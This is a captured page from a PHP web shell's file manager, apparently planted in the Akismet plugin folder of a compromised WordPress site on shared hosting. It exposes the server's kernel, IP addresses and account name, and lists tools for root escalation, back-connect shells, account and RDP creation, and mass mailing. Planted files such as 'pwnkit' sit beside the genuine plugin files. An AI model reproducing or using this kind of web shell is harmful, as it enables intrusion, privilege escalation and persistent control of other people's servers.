Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
maze /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
Name
Size
Permission
Action
_inc
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.htaccess
786
B
-rw----r--
.mad-root
0
B
-rw-r--r--
LICENSE.txt
17.67
KB
-rw----r--
adminer.php
0
B
-rw-r--r--
akismet.php
2.69
KB
-rw----r--
changelog.txt
22.83
KB
-rw----r--
class-akismet-compatible-plugi...
7.83
KB
-rw----r--
class.akismet-admin.php
63.71
KB
-rw----r--
class.akismet-cli.php
4.89
KB
-rw----r--
class.akismet-rest-api.php
19.71
KB
-rw----r--
class.akismet-widget.php
4.39
KB
-rw----r--
class.akismet.php
82.44
KB
-rw----r--
index.php
58
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
5.96
KB
-rw----r--
wrapper.php
6.28
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet(-frontend|-admin)?\.js|akismet(-admin)?(-rtl)?\.css|inter\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^(logo-a-2x\.png|akismet-refresh-logo\.svg|akismet-refresh-logo@2x\.png|arrow-left\.svg|akismet-activation-banner-elements\.png)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Close